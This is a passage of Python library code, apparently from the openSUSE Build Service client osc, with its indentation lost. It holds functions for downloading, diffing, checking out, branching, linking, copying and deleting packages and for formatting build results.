meta = get_user_meta(apiurl, user)
return _get_xml_data(meta, *tags)
def get_group_data(apiurl, group, *tags):
meta = get_group_meta(apiurl, group)
return _get_xml_data(meta, *tags)
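# Illustrative sketch (not part of osc itself): reading selected fields from a
# user's meta with get_user_data().  The login and the requested tags are
# placeholders; tags missing from the meta come back as '-'.
def _example_print_user(apiurl, user='alice'):
    """Print realname and email of a user (example only)."""
    realname, email = get_user_data(apiurl, user, 'realname', 'email')
    print('%s <%s>' % (realname, email))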
def download(url, filename, progress_obj = None, mtime = None):
import tempfile, shutil
global BUFSIZE
o = None
try:
prefix = os.path.basename(filename)
path = os.path.dirname(filename)
(fd, tmpfile) = tempfile.mkstemp(dir=path, prefix = prefix, suffix = '.osctmp')
os.fchmod(fd, 0o644)
try:
o = os.fdopen(fd, 'wb')
for buf in streamfile(url, http_GET, BUFSIZE, progress_obj=progress_obj):
o.write(bytes(buf, "utf-8"))
o.close()
os.rename(tmpfile, filename)
except:
os.unlink(tmpfile)
raise
finally:
if o is not None:
o.close()
if mtime:
utime(filename, (-1, mtime))
def get_source_file(apiurl, prj, package, filename, targetfilename=None, revision=None, progress_obj=None, mtime=None, meta=False):
targetfilename = targetfilename or filename
query = {}
if meta:
        query['meta'] = 1
if revision:
query['rev'] = revision
u = makeurl(apiurl, ['source', prj, package, pathname2url(filename.encode(locale.getpreferredencoding(), 'replace'))], query=query)
download(u, targetfilename, progress_obj, mtime)
def get_binary_file(apiurl, prj, repo, arch,
filename,
package = None,
target_filename = None,
target_mtime = None,
progress_meter = False):
progress_obj = None
if progress_meter:
from .meter import TextMeter
progress_obj = TextMeter()
target_filename = target_filename or filename
where = package or '_repository'
u = makeurl(apiurl, ['build', prj, repo, arch, where, filename])
download(u, target_filename, progress_obj, target_mtime)
if target_filename.endswith('.AppImage'):
os.chmod(target_filename, 0o755)
def dgst_from_string(str):
    # Python 2.5 deprecates the md5 module
# Python 2.4 doesn't have hashlib yet
try:
import hashlib
md5_hash = hashlib.md5()
except ImportError:
import md5
md5_hash = md5.new()
md5_hash.update(str)
return md5_hash.hexdigest()
def dgst(file):
#if not os.path.exists(file):
#return None
global BUFSIZE
try:
import hashlib
md5 = hashlib
except ImportError:
import md5
md5 = md5
s = md5.md5()
f = open(file, 'rb')
while True:
buf = f.read(BUFSIZE)
if not buf: break
s.update(buf)
    f.close()
    return s.hexdigest()
def binary(s):
"""return true if a string is binary data using diff's heuristic"""
if s and bytes('\0', "utf-8") in s[:4096]:
return True
return False
def binary_file(fn):
"""read 4096 bytes from a file named fn, and call binary() on the data"""
return binary(open(fn, 'rb').read(4096))
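# Illustrative sketch (not part of osc itself): the two helpers above also work on
# arbitrary local files; the path below is a placeholder.
def _example_describe_file(fn='/tmp/example.dat'):
    """Print the md5 digest of fn and whether it looks binary (example only)."""
    print('%s md5=%s binary=%s' % (fn, dgst(fn), binary_file(fn)))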
def get_source_file_diff(dir, filename, rev, oldfilename = None, olddir = None, origfilename = None):
"""
This methods diffs oldfilename against filename (so filename will
be shown as the new file).
The variable origfilename is used if filename and oldfilename differ
in their names (for instance if a tempfile is used for filename etc.)
"""
import difflib
global store
if not oldfilename:
oldfilename = filename
if not olddir:
olddir = os.path.join(dir, store)
if not origfilename:
origfilename = filename
file1 = os.path.join(olddir, oldfilename) # old/stored original
file2 = os.path.join(dir, filename) # working copy
if binary_file(file1) or binary_file(file2):
return ['Binary file \'%s\' has changed.\n' % origfilename]
f1 = f2 = None
try:
f1 = open(file1, 'rt')
s1 = f1.readlines()
f1.close()
f2 = open(file2, 'rt')
s2 = f2.readlines()
f2.close()
finally:
if f1:
f1.close()
if f2:
f2.close()
d = difflib.unified_diff(s1, s2,
fromfile = '%s\t(revision %s)' % (origfilename, rev), \
tofile = '%s\t(working copy)' % origfilename)
d = list(d)
# python2.7's difflib slightly changed the format
# adapt old format to the new format
if len(d) > 1:
d[0] = d[0].replace(' \n', '\n')
d[1] = d[1].replace(' \n', '\n')
# if file doesn't end with newline, we need to append one in the diff result
for i, line in enumerate(d):
if not line.endswith('\n'):
d[i] += '\n\\ No newline at end of file'
if i+1 != len(d):
d[i] += '\n'
return d
def server_diff(apiurl,
old_project, old_package, old_revision,
new_project, new_package, new_revision,
unified=False, missingok=False, meta=False, expand=True, onlyissues=False, full=True):
query = {'cmd': 'diff'}
if expand:
query['expand'] = 1
if old_project:
query['oproject'] = old_project
if old_package:
query['opackage'] = old_package
if old_revision:
query['orev'] = old_revision
if new_revision:
query['rev'] = new_revision
if unified:
query['unified'] = 1
if missingok:
query['missingok'] = 1
if meta:
query['meta'] = 1
if full:
query['filelimit'] = 0
query['tarlimit'] = 0
if onlyissues:
query['onlyissues'] = 1
query['view'] = 'xml'
query['unified'] = 0
u = makeurl(apiurl, ['source', new_project, new_package], query=query)
f = http_POST(u)
if onlyissues:
issue_list = []
root = ET.fromstring(f.read())
node = root.find('issues')
for issuenode in node.findall('issue'):
issue_list.append(issuenode.get('label'))
return '\n'.join(issue_list)
return f.read()
def server_diff_noex(apiurl,
old_project, old_package, old_revision,
new_project, new_package, new_revision,
unified=False, missingok=False, meta=False, expand=True, onlyissues=False):
try:
return server_diff(apiurl,
old_project, old_package, old_revision,
new_project, new_package, new_revision,
unified, missingok, meta, expand, onlyissues)
except HTTPError as e:
msg = None
body = None
try:
body = e.read()
if not 'bad link' in body:
return '# diff failed: ' + body
except:
return '# diff failed with unknown error'
if expand:
rdiff = "## diff on expanded link not possible, showing unexpanded version\n"
try:
rdiff += server_diff_noex(apiurl,
old_project, old_package, old_revision,
new_project, new_package, new_revision,
unified, missingok, meta, False)
except:
elm = ET.fromstring(body).find('summary')
summary = ''
if not elm is None:
summary = elm.text
return 'error: diffing failed: %s' % summary
return rdiff
def request_diff(apiurl, reqid):
u = makeurl(apiurl, ['request', reqid], query={'cmd': 'diff'} )
f = http_POST(u)
return f.read()
def submit_action_diff(apiurl, action):
"""diff a single submit action"""
    # backward compatibility: only a recent api/backend supports the missingok parameter
try:
return server_diff(apiurl, action.tgt_project, action.tgt_package, None,
action.src_project, action.src_package, action.src_rev, True, True)
except HTTPError as e:
if e.code == 400:
try:
return server_diff(apiurl, action.tgt_project, action.tgt_package, None,
action.src_project, action.src_package, action.src_rev, True, False)
except HTTPError as e:
if e.code != 404:
raise e
root = ET.fromstring(e.read())
return 'error: \'%s\' does not exist' % root.find('summary').text
elif e.code == 404:
root = ET.fromstring(e.read())
return 'error: \'%s\' does not exist' % root.find('summary').text
raise e
def make_dir(apiurl, project, package, pathname=None, prj_dir=None, package_tracking=True, pkg_path=None):
"""
creates the plain directory structure for a package dir.
The 'apiurl' parameter is needed for the project dir initialization.
The 'project' and 'package' parameters specify the name of the
project and the package. The optional 'pathname' parameter is used
for printing out the message that a new dir was created (default: 'prj_dir/package').
The optional 'prj_dir' parameter specifies the path to the project dir (default: 'project').
If pkg_path is not None store the package's content in pkg_path (no project structure is created)
"""
prj_dir = prj_dir or project
    # FIXME: carefully test each path component of prj_dir,
# if we have a .osc/_files entry at that level.
# -> if so, we have a package/project clash,
# and should rename this path component by appending '.proj'
# and give user a warning message, to discourage such clashes
if pkg_path is None:
pathname = pathname or getTransActPath(os.path.join(prj_dir, package))
pkg_path = os.path.join(prj_dir, package)
if is_package_dir(prj_dir):
# we want this to become a project directory,
# but it already is a package directory.
raise oscerr.OscIOError(None, 'checkout_package: package/project clash. Moving myself away not implemented')
if not is_project_dir(prj_dir):
            # this directory could exist as a parent directory for one of our earlier
            # checked out sub-projects. In this case, we still need to initialize it.
print(statfrmt('A', prj_dir))
Project.init_project(apiurl, prj_dir, project, package_tracking)
if is_project_dir(os.path.join(prj_dir, package)):
# the thing exists, but is a project directory and not a package directory
# FIXME: this should be a warning message to discourage package/project clashes
raise oscerr.OscIOError(None, 'checkout_package: package/project clash. Moving project away not implemented')
else:
pathname = pkg_path
if not os.path.exists(pkg_path):
print(statfrmt('A', pathname))
os.mkdir(os.path.join(pkg_path))
# os.mkdir(os.path.join(prj_dir, package, store))
return pkg_path
def checkout_package(apiurl, project, package,
revision=None, pathname=None, prj_obj=None,
expand_link=False, prj_dir=None, server_service_files = None, service_files=None, progress_obj=None, size_limit=None, meta=False, outdir=None):
try:
# the project we're in might be deleted.
# that'll throw an error then.
olddir = os.getcwd()
except:
olddir = os.environ.get("PWD")
if not prj_dir:
prj_dir = olddir
else:
if sys.platform[:3] == 'win':
prj_dir = prj_dir[:2] + prj_dir[2:].replace(':', ';')
else:
if conf.config['checkout_no_colon']:
prj_dir = prj_dir.replace(':', '/')
root_dots = '.'
if conf.config['checkout_rooted']:
if prj_dir[:1] == '/':
if conf.config['verbose'] > 1:
print("checkout_rooted ignored for %s" % prj_dir)
# ?? should we complain if not is_project_dir(prj_dir) ??
else:
# if we are inside a project or package dir, ascend to parent
# directories, so that all projects are checked out relative to
# the same root.
if is_project_dir(".."):
# if we are in a package dir, goto parent.
# Hmm, with 'checkout_no_colon' in effect, we have directory levels that
# do not easily reveal the fact, that they are part of a project path.
# At least this test should find that the parent of 'home/username/branches'
# is a project (hack alert). Also goto parent in this case.
root_dots = "../"
elif is_project_dir("../.."):
# testing two levels is better than one.
# May happen in case of checkout_no_colon, or
# if project roots were previously inconsistent
root_dots = "../../"
if is_project_dir(root_dots):
oldproj = store_read_project(root_dots)
if conf.config['checkout_no_colon']:
n = len(oldproj.split(':'))
else:
n = 1
if root_dots == '.':
root_dots = ''
root_dots = root_dots + "../" * n
if root_dots != '.':
if conf.config['verbose']:
print("%s is project dir of %s. Root found at %s" %
(prj_dir, oldproj, os.path.abspath(root_dots)))
prj_dir = root_dots + prj_dir
if not pathname:
pathname = getTransActPath(os.path.join(prj_dir, package))
# before we create directories and stuff, check if the package actually
# exists
show_package_meta(apiurl, quote_plus(project), quote_plus(package), meta)
isfrozen = False
if expand_link:
# try to read from the linkinfo
# if it is a link we use the xsrcmd5 as the revision to be
# checked out
try:
x = show_upstream_xsrcmd5(apiurl, project, package, revision=revision, meta=meta, include_service_files=server_service_files)
except:
x = show_upstream_xsrcmd5(apiurl, project, package, revision=revision, meta=meta, linkrev='base', include_service_files=server_service_files)
if x:
isfrozen = True
if x:
revision = x
directory = make_dir(apiurl, project, package, pathname, prj_dir, conf.config['do_package_tracking'], outdir)
p = Package.init_package(apiurl, project, package, directory, size_limit, meta, progress_obj)
if isfrozen:
p.mark_frozen()
# no project structure is wanted when outdir is used
if conf.config['do_package_tracking'] and outdir is None:
# check if we can re-use an existing project object
if prj_obj is None:
prj_obj = Project(prj_dir)
prj_obj.set_state(p.name, ' ')
prj_obj.write_packages()
p.update(revision, server_service_files, size_limit)
if service_files:
        print('Running all source services locally')
p.run_source_services()
def replace_pkg_meta(pkgmeta, new_name, new_prj, keep_maintainers = False,
dst_userid = None, keep_develproject = False):
"""
update pkgmeta with new new_name and new_prj and set calling user as the
only maintainer (unless keep_maintainers is set). Additionally remove the
develproject entry (<devel />) unless keep_develproject is true.
"""
root = ET.fromstring(''.join(pkgmeta))
root.set('name', new_name)
root.set('project', new_prj)
# never take releasename, it needs to be explicit
for releasename in root.findall('releasename'):
root.remove(releasename)
if not keep_maintainers:
for person in root.findall('person'):
root.remove(person)
if not keep_develproject:
for dp in root.findall('devel'):
root.remove(dp)
return ET.tostring(root, encoding=ET_ENCODING)
def link_to_branch(apiurl, project, package):
"""
convert a package with a _link + project.diff to a branch
"""
if '_link' in meta_get_filelist(apiurl, project, package):
u = makeurl(apiurl, ['source', project, package], 'cmd=linktobranch')
http_POST(u)
else:
raise oscerr.OscIOError(None, 'no _link file inside project \'%s\' package \'%s\'' % (project, package))
def link_pac(src_project, src_package, dst_project, dst_package, force, rev='', cicount='', disable_publish = False, missing_target = False, vrev=''):
"""
create a linked package
- "src" is the original package
- "dst" is the "link" package that we are creating here
"""
meta_change = False
dst_meta = ''
apiurl = conf.config['apiurl']
try:
dst_meta = meta_exists(metatype='pkg',
path_args=(quote_plus(dst_project), quote_plus(dst_package)),
template_args=None,
create_new=False, apiurl=apiurl)
root = ET.fromstring(''.join(dst_meta))
if root.get('project') != dst_project:
# The source comes from a different project via a project link, we need to create this instance
meta_change = True
except:
meta_change = True
if meta_change:
if missing_target:
dst_meta = '<package name="%s"><title/><description/></package>' % dst_package
else:
src_meta = show_package_meta(apiurl, src_project, src_package)
dst_meta = replace_pkg_meta(src_meta, dst_package, dst_project)
if disable_publish:
meta_change = True
root = ET.fromstring(''.join(dst_meta))
elm = root.find('publish')
if not elm:
elm = ET.SubElement(root, 'publish')
elm.clear()
ET.SubElement(elm, 'disable')
dst_meta = ET.tostring(root, encoding=ET_ENCODING)
if meta_change:
edit_meta('pkg',
path_args=(dst_project, dst_package),
data=dst_meta)
# create the _link file
# but first, make sure not to overwrite an existing one
if '_link' in meta_get_filelist(apiurl, dst_project, dst_package):
if force:
print('forced overwrite of existing _link file', file=sys.stderr)
else:
print(file=sys.stderr)
print('_link file already exists...! Aborting', file=sys.stderr)
sys.exit(1)
if rev:
rev = ' rev="%s"' % rev
else:
rev = ''
if vrev:
vrev = ' vrev="%s"' % vrev
else:
vrev = ''
missingok = ''
if missing_target:
missingok = ' missingok="true"'
if cicount:
cicount = ' cicount="%s"' % cicount
else:
cicount = ''
print('Creating _link...', end=' ')
project = ''
if src_project != dst_project:
project = 'project="%s"' % src_project
link_template = """\
<link %s package="%s"%s%s%s%s>
<patches>
<!-- <branch /> for a full copy, default case -->
<!-- <apply name="patch" /> apply a patch on the source directory -->
<!-- <topadd>%%define build_with_feature_x 1</topadd> add a line on the top (spec file only) -->
<!-- <add name="file.patch" /> add a patch to be applied after %%setup (spec file only) -->
<!-- <delete name="filename" /> delete a file -->
</patches>
</link>
""" % (project, src_package, missingok, rev, vrev, cicount)
u = makeurl(apiurl, ['source', dst_project, dst_package, '_link'])
http_PUT(u, data=link_template)
print('Done.')
def aggregate_pac(src_project, src_package, dst_project, dst_package, repo_map = {}, disable_publish = False, nosources = False):
"""
aggregate package
- "src" is the original package
- "dst" is the "aggregate" package that we are creating here
- "map" is a dictionary SRC => TARGET repository mappings
"""
meta_change = False
dst_meta = ''
apiurl = conf.config['apiurl']
try:
dst_meta = meta_exists(metatype='pkg',
path_args=(quote_plus(dst_project), quote_plus(dst_package)),
template_args=None,
create_new=False, apiurl=apiurl)
root = ET.fromstring(''.join(dst_meta))
if root.get('project') != dst_project:
# The source comes from a different project via a project link, we need to create this instance
meta_change = True
except:
meta_change = True
if meta_change:
src_meta = show_package_meta(apiurl, src_project, src_package)
dst_meta = replace_pkg_meta(src_meta, dst_package, dst_project)
meta_change = True
if disable_publish:
meta_change = True
root = ET.fromstring(''.join(dst_meta))
elm = root.find('publish')
if not elm:
elm = ET.SubElement(root, 'publish')
elm.clear()
ET.SubElement(elm, 'disable')
dst_meta = ET.tostring(root, encoding=ET_ENCODING)
if meta_change:
edit_meta('pkg',
path_args=(dst_project, dst_package),
data=dst_meta)
# create the _aggregate file
# but first, make sure not to overwrite an existing one
if '_aggregate' in meta_get_filelist(apiurl, dst_project, dst_package):
print(file=sys.stderr)
print('_aggregate file already exists...! Aborting', file=sys.stderr)
sys.exit(1)
print('Creating _aggregate...', end=' ')
aggregate_template = """\
<aggregatelist>
<aggregate project="%s">
""" % (src_project)
aggregate_template += """\
<package>%s</package>
""" % ( src_package)
if nosources:
aggregate_template += """\
<nosources />
"""
for src, tgt in repo_map.items():
aggregate_template += """\
<repository target="%s" source="%s" />
""" % (tgt, src)
aggregate_template += """\
</aggregate>
</aggregatelist>
"""
u = makeurl(apiurl, ['source', dst_project, dst_package, '_aggregate'])
http_PUT(u, data=aggregate_template)
print('Done.')
def attribute_branch_pkg(apiurl, attribute, maintained_update_project_attribute, package, targetproject, return_existing=False, force=False, noaccess=False, add_repositories=False, dryrun=False, nodevelproject=False, maintenance=False):
"""
Branch packages defined via attributes (via API call)
"""
query = { 'cmd': 'branch' }
query['attribute'] = attribute
if targetproject:
query['target_project'] = targetproject
if dryrun:
query['dryrun'] = "1"
if force:
query['force'] = "1"
if noaccess:
query['noaccess'] = "1"
if nodevelproject:
query['ignoredevel'] = '1'
if add_repositories:
query['add_repositories'] = "1"
if maintenance:
query['maintenance'] = "1"
if package:
query['package'] = package
if maintained_update_project_attribute:
query['update_project_attribute'] = maintained_update_project_attribute
u = makeurl(apiurl, ['source'], query=query)
f = None
try:
f = http_POST(u)
except HTTPError as e:
root = ET.fromstring(e.read())
summary = root.find('summary')
if summary is not None and summary.text is not None:
raise oscerr.APIError(summary.text)
msg = 'unexpected response: %s' % ET.tostring(root, encoding=ET_ENCODING)
raise oscerr.APIError(msg)
r = None
root = ET.fromstring(f.read())
if dryrun:
return root
# TODO: change api here and return parsed XML as class
if conf.config['http_debug']:
print(ET.tostring(root, encoding=ET_ENCODING), file=sys.stderr)
for node in root.findall('data'):
r = node.get('name')
if r and r == 'targetproject':
return node.text
return r
def branch_pkg(apiurl, src_project, src_package, nodevelproject=False, rev=None, linkrev=None, target_project=None, target_package=None, return_existing=False, msg='', force=False, noaccess=False, add_repositories=False, add_repositories_block=None, add_repositories_rebuild=None, extend_package_names=False, missingok=False, maintenance=False, newinstance=False):
"""
Branch a package (via API call)
"""
query = { 'cmd': 'branch' }
if nodevelproject:
query['ignoredevel'] = '1'
if force:
query['force'] = '1'
if noaccess:
query['noaccess'] = '1'
if add_repositories:
query['add_repositories'] = "1"
if add_repositories_block:
query['add_repositories_block'] = add_repositories_block
if add_repositories_rebuild:
query['add_repositories_rebuild'] = add_repositories_rebuild
if maintenance:
query['maintenance'] = "1"
if missingok:
query['missingok'] = "1"
if newinstance:
query['newinstance'] = "1"
if extend_package_names:
query['extend_package_names'] = "1"
if rev:
query['rev'] = rev
if linkrev:
query['linkrev'] = linkrev
if target_project:
query['target_project'] = target_project
if target_package:
query['target_package'] = target_package
if msg:
query['comment'] = msg
u = makeurl(apiurl, ['source', src_project, src_package], query=query)
try:
f = http_POST(u)
except HTTPError as e:
root = ET.fromstring(e.read())
if missingok:
            if root is not None and root.get('code') == "not_missing":
raise oscerr.NotMissing("Package exists already via project link, but link will point to given project")
summary = root.find('summary')
if summary is None:
raise oscerr.APIError('unexpected response:\n%s' % ET.tostring(root, encoding=ET_ENCODING))
if not return_existing:
raise oscerr.APIError('failed to branch: %s' % summary.text)
m = re.match(r"branch target package already exists: (\S+)/(\S+)", summary.text)
if not m:
e.msg += '\n' + summary.text
raise
return (True, m.group(1), m.group(2), None, None)
root = ET.fromstring(f.read())
if conf.config['http_debug']:
print(ET.tostring(root, encoding=ET_ENCODING), file=sys.stderr)
data = {}
for i in root.findall('data'):
data[i.get('name')] = i.text
return (False, data.get('targetproject', None), data.get('targetpackage', None),
data.get('sourceproject', None), data.get('sourcepackage', None))
def copy_pac(src_apiurl, src_project, src_package,
dst_apiurl, dst_project, dst_package,
client_side_copy = False,
keep_maintainers = False,
keep_develproject = False,
expand = False,
revision = None,
comment = None,
force_meta_update = None,
keep_link = None):
"""
Create a copy of a package.
Copying can be done by downloading the files from one package and commit
them into the other by uploading them (client-side copy) --
or by the server, in a single api call.
"""
if not (src_apiurl == dst_apiurl and src_project == dst_project \
and src_package == dst_package):
src_meta = show_package_meta(src_apiurl, src_project, src_package)
dst_userid = conf.get_apiurl_usr(dst_apiurl)
src_meta = replace_pkg_meta(src_meta, dst_package, dst_project, keep_maintainers,
dst_userid, keep_develproject)
url = make_meta_url('pkg', (quote_plus(dst_project),) + (quote_plus(dst_package),), dst_apiurl)
found = None
try:
found = http_GET(url).readlines()
except HTTPError as e:
pass
if force_meta_update or not found:
print('Sending meta data...')
u = makeurl(dst_apiurl, ['source', dst_project, dst_package, '_meta'])
http_PUT(u, data=src_meta)
print('Copying files...')
if not client_side_copy:
query = {'cmd': 'copy', 'oproject': src_project, 'opackage': src_package }
if expand or keep_link:
query['expand'] = '1'
if keep_link:
query['keeplink'] = '1'
if revision:
query['orev'] = revision
if comment:
query['comment'] = comment
u = makeurl(dst_apiurl, ['source', dst_project, dst_package], query=query)
f = http_POST(u)
return f.read()
else:
# copy one file after the other
import tempfile
query = {'rev': 'upload'}
xml = show_files_meta(src_apiurl, src_project, src_package,
expand=expand, revision=revision)
filelist = ET.fromstring(xml)
revision = filelist.get('srcmd5')
# filter out _service: files
for entry in filelist.findall('entry'):
            # hmm the old code also checked for _service_ (but this is
            # probably a relic from former times (if at all))
if entry.get('name').startswith('_service:'):
filelist.remove(entry)
tfilelist = Package.commit_filelist(dst_apiurl, dst_project,
dst_package, filelist, msg=comment)
todo = Package.commit_get_missing(tfilelist)
for filename in todo:
print(' ', filename)
# hmm ideally, we would pass a file-like (that delegates to
# streamfile) to http_PUT...
with tempfile.NamedTemporaryFile(prefix='osc-copypac') as f:
get_source_file(src_apiurl, src_project, src_package, filename,
targetfilename=f.name, revision=revision)
path = ['source', dst_project, dst_package, pathname2url(filename)]
u = makeurl(dst_apiurl, path, query={'rev': 'repository'})
http_PUT(u, file=f.name)
tfilelist = Package.commit_filelist(dst_apiurl, dst_project, dst_package,
filelist, msg=comment)
todo = Package.commit_get_missing(tfilelist)
if todo:
raise oscerr.APIError('failed to copy: %s' % ', '.join(todo))
return 'Done.'
def unlock_package(apiurl, prj, pac, msg):
query = {'cmd': 'unlock', 'comment': msg}
u = makeurl(apiurl, ['source', prj, pac], query)
http_POST(u)
def unlock_project(apiurl, prj, msg=None):
query = {'cmd': 'unlock', 'comment': msg}
u = makeurl(apiurl, ['source', prj], query)
http_POST(u)
def undelete_package(apiurl, prj, pac, msg=None):
query = {'cmd': 'undelete'}
if msg:
query['comment'] = msg
else:
query['comment'] = 'undeleted via osc'
u = makeurl(apiurl, ['source', prj, pac], query)
http_POST(u)
def undelete_project(apiurl, prj, msg=None):
query = {'cmd': 'undelete'}
if msg:
query['comment'] = msg
else:
query['comment'] = 'undeleted via osc'
u = makeurl(apiurl, ['source', prj], query)
http_POST(u)
def delete_package(apiurl, prj, pac, force=False, msg=None):
query = {}
if force:
query['force'] = "1"
if msg:
query['comment'] = msg
u = makeurl(apiurl, ['source', prj, pac], query)
http_DELETE(u)
def delete_project(apiurl, prj, force=False, msg=None):
query = {}
if force:
query['force'] = "1"
if msg:
query['comment'] = msg
u = makeurl(apiurl, ['source', prj], query)
http_DELETE(u)
def delete_files(apiurl, prj, pac, files):
for filename in files:
u = makeurl(apiurl, ['source', prj, pac, filename], query={'comment': 'removed %s' % (filename, )})
http_DELETE(u)
# old compat lib call
def get_platforms(apiurl):
return get_repositories(apiurl)
def get_repositories(apiurl):
f = http_GET(makeurl(apiurl, ['platform']))
tree = ET.parse(f)
r = sorted([ node.get('name') for node in tree.getroot() ])
return r
def get_distibutions(apiurl, discon=False):
r = []
    # FIXME: this is just a naming convention on api.opensuse.org, but not a generally valid approach
if discon:
result_line_templ = '%(name)-25s %(project)s'
f = http_GET(makeurl(apiurl, ['build']))
root = ET.fromstring(''.join(f))
for node in root.findall('entry'):
if node.get('name').startswith('DISCONTINUED:'):
rmap = {}
rmap['name'] = node.get('name').replace('DISCONTINUED:', '').replace(':', ' ')
rmap['project'] = node.get('name')
r.append (result_line_templ % rmap)
r.insert(0, 'distribution project')
r.insert(1, '------------ -------')
else:
result_line_templ = '%(name)-25s %(project)-25s %(repository)-25s %(reponame)s'
f = http_GET(makeurl(apiurl, ['distributions']))
root = ET.fromstring(''.join(f))
for node in root.findall('distribution'):
rmap = {}
for node2 in node.findall('name'):
rmap['name'] = node2.text
for node3 in node.findall('project'):
rmap['project'] = node3.text
for node4 in node.findall('repository'):
rmap['repository'] = node4.text
for node5 in node.findall('reponame'):
rmap['reponame'] = node5.text
r.append(result_line_templ % rmap)
r.insert(0, 'distribution project repository reponame')
r.insert(1, '------------ ------- ---------- --------')
return r
# old compat lib call
def get_platforms_of_project(apiurl, prj):
return get_repositories_of_project(apiurl, prj)
def get_repositories_of_project(apiurl, prj):
f = show_project_meta(apiurl, prj)
root = ET.fromstring(''.join(f))
r = [ node.get('name') for node in root.findall('repository')]
return r
class Repo:
repo_line_templ = '%-15s %-10s'
def __init__(self, name, arch):
self.name = name
self.arch = arch
def __str__(self):
return self.repo_line_templ % (self.name, self.arch)
def __repr__(self):
return 'Repo(%s %s)' % (self.name, self.arch)
@staticmethod
def fromfile(filename):
if not os.path.exists(filename):
return []
repos = []
lines = open(filename, 'r').readlines()
for line in lines:
data = line.split()
if len(data) == 2:
repos.append(Repo(data[0], data[1]))
elif len(data) == 1:
# only for backward compatibility
repos.append(Repo(data[0], ''))
return repos
@staticmethod
def tofile(filename, repos):
with open(filename, 'w') as f:
for repo in repos:
f.write('%s %s\n' % (repo.name, repo.arch))
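# Illustrative sketch (not executed; the project name and cache path are made
# up): the Repo helpers above, together with get_repos_of_project() below,
# could be used to cache a project's repo/arch pairs on disk.
#
#   repos = list(get_repos_of_project(apiurl, 'home:user:example'))
#   Repo.tofile('/tmp/_build_repos', repos)
#   for repo in Repo.fromfile('/tmp/_build_repos'):
#       print(repo)   # Repo.__str__ renders "name            arch"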
def get_repos_of_project(apiurl, prj):
f = show_project_meta(apiurl, prj)
root = ET.fromstring(''.join(f))
for node in root.findall('repository'):
for node2 in node.findall('arch'):
yield Repo(node.get('name'), node2.text)
def get_binarylist(apiurl, prj, repo, arch, package=None, verbose=False):
what = package or '_repository'
u = makeurl(apiurl, ['build', prj, repo, arch, what])
f = http_GET(u)
tree = ET.parse(f)
if not verbose:
return [ node.get('filename') for node in tree.findall('binary')]
else:
l = []
for node in tree.findall('binary'):
f = File(node.get('filename'),
None,
int(node.get('size')),
int(node.get('mtime')))
l.append(f)
return l
def get_binarylist_published(apiurl, prj, repo, arch):
u = makeurl(apiurl, ['published', prj, repo, arch])
f = http_GET(u)
tree = ET.parse(f)
r = [ node.get('name') for node in tree.findall('entry')]
return r
def show_results_meta(apiurl, prj, package=None, lastbuild=None, repository=[], arch=[], oldstate=None, multibuild=False, locallink=False):
query = {}
if package:
query['package'] = package
if oldstate:
query['oldstate'] = oldstate
if lastbuild:
query['lastbuild'] = 1
if multibuild:
query['multibuild'] = 1
if locallink:
query['locallink'] = 1
u = makeurl(apiurl, ['build', prj, '_result'], query=query)
for repo in repository:
u = u + '&repository=%s' % repo
for a in arch:
u = u + '&arch=%s' % a
f = http_GET(u)
return f.readlines()
def show_prj_results_meta(apiurl, prj):
u = makeurl(apiurl, ['build', prj, '_result'])
f = http_GET(u)
return f.readlines()
def result_xml_to_dicts(xml):
# assumption: xml contains at most one status element (maybe we should
    # generalize this to arbitrary status elements)
root = ET.fromstring(xml)
for node in root.findall('result'):
rmap = {}
rmap['project'] = rmap['prj'] = node.get('project')
rmap['repository'] = rmap['repo'] = rmap['rep'] = node.get('repository')
rmap['arch'] = node.get('arch')
rmap['state'] = node.get('state')
rmap['dirty'] = node.get('dirty') == 'true'
rmap['repostate'] = node.get('code')
rmap['pkg'] = rmap['package'] = rmap['pac'] = ''
rmap['code'] = node.get('code')
rmap['details'] = ''
        # the way we currently use this function, there should always
        # be a status element
snodes = node.findall('status')
is_multi = len(snodes) > 1
if len(snodes) < 1:
# the repository setup is broken
smap = dict(rmap)
smap['pkg'] = "_repository"
smap['code'] = rmap['repostate']
smap['details'] = node.get('details')
yield smap, is_multi
continue
for statusnode in snodes:
smap = dict(rmap)
smap['pkg'] = smap['package'] = smap['pac'] = statusnode.get('package')
smap['code'] = statusnode.get('code', '')
details = statusnode.find('details')
if details is not None:
smap['details'] = details.text
yield smap, is_multi
def format_results(results, format):
"""apply selected format on each dict in results and return it as a list of strings"""
return [format % r for r in results]
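# Illustrative sketch (not executed; project/package names are made up):
# result_xml_to_dicts() and format_results() can be combined to render the
# xml returned by show_results_meta().
#
#   xml = ''.join(show_results_meta(apiurl, 'home:user:example', 'mypkg'))
#   dicts = [res for res, _ in result_xml_to_dicts(xml)]
#   for line in format_results(dicts, '%(repository)-20s %(arch)-10s %(code)s'):
#       print(line)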
def get_results(apiurl, project, package, verbose=False, printJoin='', *args, **kwargs):
"""returns list of/or prints a human readable status for the specified package"""
# hmm the function name is a bit too generic - something like
# get_package_results_human would be better, but this would break the existing
# api (unless we keep get_results around as well)...
result_line_templ = '%(rep)-20s %(arch)-10s %(status)s'
result_line_mb_templ = '%(rep)-20s %(arch)-10s %(pkg)-30s %(status)s'
r = []
printed = False
multibuild_packages = kwargs.pop('multibuild_packages', [])
show_excluded = kwargs.pop('showexcl', False)
for results in get_package_results(apiurl, project, package, **kwargs):
r = []
for res, is_multi in result_xml_to_dicts(results):
if not show_excluded and res['code'] == 'excluded':
continue
if '_oldstate' in res:
oldstate = res['_oldstate']
continue
if multibuild_packages:
l = res['pkg'].rsplit(':', 1)
if len(l) != 2 or l[1] not in multibuild_packages:
continue
res['status'] = res['code']
if verbose and res['details'] != '':
if res['code'] in ('unresolvable', 'expansion error'):
lines = res['details'].split(',')
res['status'] += ': ' + '\n '.join(lines)
else:
res['status'] += ': %s' % res['details']
elif res['code'] in ('scheduled', ) and res['details']:
# highlight scheduled jobs with possible dispatch problems
res['status'] += '*'
if res['dirty']:
if verbose:
res['status'] = 'outdated (was: %s)' % res['status']
else:
res['status'] += '*'
elif res['code'] in ('succeeded', ) and res['repostate'] != "published":
if verbose:
res['status'] += '(unpublished)'
else:
res['status'] += '*'
if is_multi:
r.append(result_line_mb_templ % res)
else:
r.append(result_line_templ % res)
if printJoin:
if printed:
                # print a newline if a result was already printed (improves readability)
print()
print(printJoin.join(r))
printed = True
return r
def get_package_results(apiurl, project, package, wait=False, *args, **kwargs):
    """generator that returns the package results as an xml structure"""
xml = ''
waiting_states = ('blocked', 'scheduled', 'dispatching', 'building',
'signing', 'finished')
while True:
waiting = False
try:
xml = ''.join(show_results_meta(apiurl, project, package, *args, **kwargs))
except HTTPError as e:
